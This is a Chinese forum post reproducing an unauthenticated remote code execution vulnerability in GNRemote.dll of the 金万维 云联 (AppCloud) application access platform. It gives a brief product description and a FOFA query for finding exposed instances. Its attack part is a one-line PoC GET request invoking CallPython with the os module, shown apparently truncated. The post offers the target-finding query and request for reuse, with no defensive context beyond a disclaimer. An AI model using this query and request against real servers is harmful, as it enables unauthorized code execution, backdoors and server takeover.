金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现 ...

打印 上一主题 下一主题

主题 857|帖子 857|积分 2571

0x01 产物简介

金万维-云联(AppCloud)应用系统接入平台是一款企业级私有云产物,旨在帮助企业构建高效便捷的私有云情况,低落运营成本,提高运营效率,并增强企业快速相应市场的能力,云联(AppCloud)由北京金万维科技有限公司开辟,它完成了从桌面机计算到云中计算的转变,不仅提供了一种空间,还实现了架构和计算方式的转变。云联要求流程自动化、简化部署,并提供机动性,以满足企业在任何地方、用任何工具都能高效工作的需求。
0x02 漏洞概述

金万维-云联应用系统接入平台 GNRemote.dll接口存在远程下令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端恣意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现情况

FOFA:title="云联应用系统接入平台"

0x04 漏洞复现

PoC
  1. GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

莫张周刘王

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表